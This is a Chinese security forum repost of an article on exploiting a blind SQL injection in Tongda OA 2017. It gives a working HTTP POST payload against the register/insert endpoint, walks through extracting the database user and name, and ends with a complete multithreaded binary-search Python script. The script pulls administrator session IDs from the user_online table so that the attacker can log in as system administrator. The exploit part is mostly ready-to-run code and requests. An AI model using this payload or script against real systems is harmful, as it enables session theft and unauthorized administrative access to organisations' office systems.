设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 多线程+二分法的巧用——通达OA SQL盲注
返回列表 发新帖
查看: 3914|回复: 0

多线程+二分法的巧用——通达OA SQL盲注

[复制链接]
wholesome

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-8-25 10:00:58 | 显示全部楼层 |阅读模式
多线程+二分法的巧用——通达OA SQL盲注
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
No.1
漏洞利用
记一次通达OA的SQL盲注注入利用,获取管理员session id,并登录后台。且poc脚本中加入多线程+二分法从而提高利用效率。
测试版本:通达2017
先上payload
  1. POST http://127.0.0.1:8088//general/document/index.php/recv/register/insert HTTP/1.1
  2. Host: 127.0.0.1:8088
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
  4. Accept-Encoding: gzip, deflate
  5. Accept: */*
  6. Connection: close
  7. Content-Type: application/x-www-form-urlencoded
  8. Content-Length: 76


  11. title)values("'"^exp(if(ascii(substr(user(),1,1))%3d114,1,710)))# =1&_SERVER=
复制代码
该漏洞为mysql bool盲注。
exp(if(ascii(substr(user(),1,1))=114,1,710))
此时会去判断user()第一位的ascii码是否为114,既"r"。如果为真,则响应码返回302。如果为假,则返回500。
ascii("r")=114。exp()函数遇到>709的数,就会报错。(该环境下,user()为"root")

尝试user()第一位的ascii码为114,既"r",返回302,说明为真

尝试user()第一位的ascii码为113,返回500,说明为假

尝试user()第一位的ascii码为115,返回500,说明为假

尝试user()第一位的ascii码为116,返回500,说明为假
  1. exp(if(ascii(substr(user(),1,1))=114,1,710)   302
  2. exp(if(ascii(substr(user(),2,1))=111,1,710)   302
  3. exp(if(ascii(substr(user(),3,1))=111,1,710)   302
  4. exp(if(ascii(substr(user(),4,1))=116,1,710)   302
  5. 既user() = "root"
复制代码
并且通过注入发现
  1. # database_length = 5
  2. # database_name = "td_oa"
  3. # user() = "root"
复制代码
No.2
获取session 长度
通过查看源码,发现user_online表的SID字段中保存了用户的session ID。于是乎可以通过sql注入去获取session,从而登录oa系统。

然后通过http响应包或者注入测试,判断session id的长度。
构造payload
title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),1,1))>1,1,710)))# =1&_SERVER=


获取第26、27位的ascii码,是否大于1
exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),1,1))>1,1,710))  302
exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),1,1))>1,1,710))  500
26为真,27为假。
http响应包中的Set-Cookie: PHPSESSID=ubg6abuvrjhr79q55bodlia3s2; PHPSESSID长度也为26。
说明session长度为26。
No.3
获取完整session id
利用for 循环去获取session id即可。
exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/{第几个用户},1),{session的第几位值},1))={ascill值},1,710)))
如果只单独使用多线程或者二分法,会导致消耗资源过多或者耗时较久。所以为了加快效率,本次使用了多线程+二分法
完整脚本如下:
  1. import requests

  3. import _thread

  5. import time

  7. requests.packages.urllib3.disable_warnings()



  11. UNAME_length = 26

  13. USERUID = []



  17. header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36',"Content-Type":"application/x-www-form-urlencoded",'Connection':'close'}

  19. proxies = {'http': '127.0.0.1:8080','https': '127.0.0.1:8080'}



  23. def get_url(url,num,uid):

  25.     global UNAME_length

  27.     global USERUID



  31.     litgh = 48

  33.     right = 120

  35.     tmp = 0

  37.     while litgh <= right:

  39.         mid = int((litgh+right)/2)

  41.         if tmp == mid:

  43.             break

  45.         else: tmp = mid

  47.         flag = run_payload(url,uid,num,mid)

  49.         if flag:

  51.             litgh = mid

  53.         else:

  55.             right = mid

  57.     USERUID[num-1] = chr(mid)

  59.     print("session: ",num,chr(mid))



  63. def run_payload(url,uid,num,mid):

  65.     try:

  67.         payload =f"""title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/{uid},1),{num},1))>%3d{mid},1,710)))# =1&_SERVER="""

  69.         req = requests.post(url, headers=header, proxies=proxies,data=payload,verify=False,timeout=20,allow_redirects=False)

  71.         if req.status_code == 302:

  73.             return True

  75.         elif req.status_code == 500:

  77.             return False

  79.         elif req.status_code != 500:

  81.             return run_payload(url,uid,num,mid)

  83.     except Exception as e:

  85.         return run_payload(url,uid,num,mid)



  89. def get_uname(url,uid):

  91.     USERUID.clear()

  93.     [USERUID.append("") for one in range(0,UNAME_length)]

  95.     for num in range(1,UNAME_length+1):

  97.         _thread.start_new_thread(get_url, (url,num,uid,)) # 多线程



  101.     tmp = 0

  103.     while 1: # 等待跑完26位session id



  107.         flag = 0

  109.         for num in range(0,len(USERUID)):

  111.             if USERUID[num] != '':

  113.                 flag += 1

  115.         uname = ""

  117.         for num in range(0,len(USERUID)):

  119.             uname += str(USERUID[num])

  121.         if flag != tmp:

  123.             print(f"已完成: {flag}/{UNAME_length}  SID:{uname}  {USERUID} ")



  127.         tmp = flag

  129.         if flag == UNAME_length:

  131.             break

  133.     time.sleep(0.5)

  135.     return uname



  139. def main(url):

  141.     url += "/general/document/index.php/recv/register/insert"

  143.     print(url)

  145.     uid=1 # 获取第几个用户的session

  147.     uname = get_uname(url,uid-1)

  149.     print("UNAME = ",uname)



  153. url="http://www.xxx.com/"

  155. main(url)
复制代码
No.4
登录后台

利用脚本跑出session id,然后替换cookie后,访问http://www.xxx.com/general/

发现成功登录,且用户为系统管理员。
招聘

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-20 11:51 , Processed in 0.015744 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表